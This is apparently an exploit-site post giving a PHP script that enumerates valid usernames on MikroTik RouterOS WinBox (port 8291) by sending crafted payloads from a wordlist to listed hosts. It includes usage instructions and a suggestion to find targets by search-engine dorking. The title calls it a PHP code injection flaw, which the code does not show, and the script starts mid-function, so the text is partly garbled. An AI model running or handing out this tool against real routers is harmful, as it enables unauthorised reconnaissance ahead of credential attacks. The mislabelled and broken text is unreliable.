============================================================================================================================================= | # Title : MikroTik RouterOS WinBox 3.41 PHP Code Injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) | | # Vendor : https://mikrotik.com/download | ============================================================================================================================================= POC : [+] Dorking İn Google Or Other Search Enggine. [+] Code Description: This code torrents usernames on MikroTik RouterOS via port 8291 (Winbox specific port) using wordlist. Identification: Identification by length of probe whether the username is valid or not. [+] save code as poc.php . [+] USage : php poc.php wordlist.txt 192.168.1.1,192.168.1.2 [+] PayLoad : getMessage() . "\n"; } return $wordlist; } // دالة إنشاء الحمولة بناءً على اسم المستخدم function create_payload($base_payload, $username) { $length = strlen($username); $first_byte = chr(0x22 + $length); // تعديل أول بايت في الحمولة return $first_byte . substr($base_payload, 1, 1) . $username . substr($base_payload, 2); } // دالة معالجة الاستجابة لتحديد صلاحية اسم المستخدم function process_response($response) { $response_length = strlen($response); if ($response_length == 51) { return "valid"; } elseif ($response_length == 35) { return "invalid"; } else { return "unknown"; } } // دالة المسح عبر الأهداف باستخدام قائمة الكلمات function scan_target($host, $port, $wordlist, $base_payload) { echo "Scanning $host:$port...\n"; $valid_usernames = []; foreach ($wordlist as $username) { $socket = @stream_socket_client("tcp://$host:$port", $errno, $errstr, 5); // الاتصال بالخادم if (!$socket) { echo "Error connecting to $host:$port for username $username: $errstr ($errno)\n"; continue; } $payload = create_payload($base_payload, $username); echo "Sending payload for username: $username\n"; fwrite($socket, $payload); // انتظار الاستجابة من الخادم $response = fread($socket, 1024); $result = process_response($response); if ($result == "valid") { $valid_usernames[] = $username; echo "Valid username found: $username\n"; } elseif ($result == "invalid") { echo "Invalid username: $username\n"; } fclose($socket); // تأخير عشوائي بين المحاولات (بين 1 و 3 ثواني) sleep(rand(1, 3)); } return $valid_usernames; } // الدالة الرئيسية لإدارة المسح عبر عدة أهداف function main($targets, $port, $wordlist_path) { $wordlist = read_wordlist($wordlist_path); if (empty($wordlist)) { echo "Wordlist is empty or could not be loaded.\n"; return; } $base_payload = "\x22\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; foreach ($targets as $target) { $valid_usernames = scan_target($target, $port, $wordlist, $base_payload); echo "Results for $target: " . (empty($valid_usernames) ? "No valid usernames found" : implode(", ", $valid_usernames)) . "\n"; } } // الجزء الذي يقوم بتنفيذ البرنامج من سطر الأوامر if ($argc < 3) { echo "Usage: php mikrotik_routeros_userenum_wordlist.php \n"; exit(1); } $wordlist_path = $argv[1]; $targets = explode(",", $argv[2]); $port = 8291; main($targets, $port, $wordlist_path); ?> Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================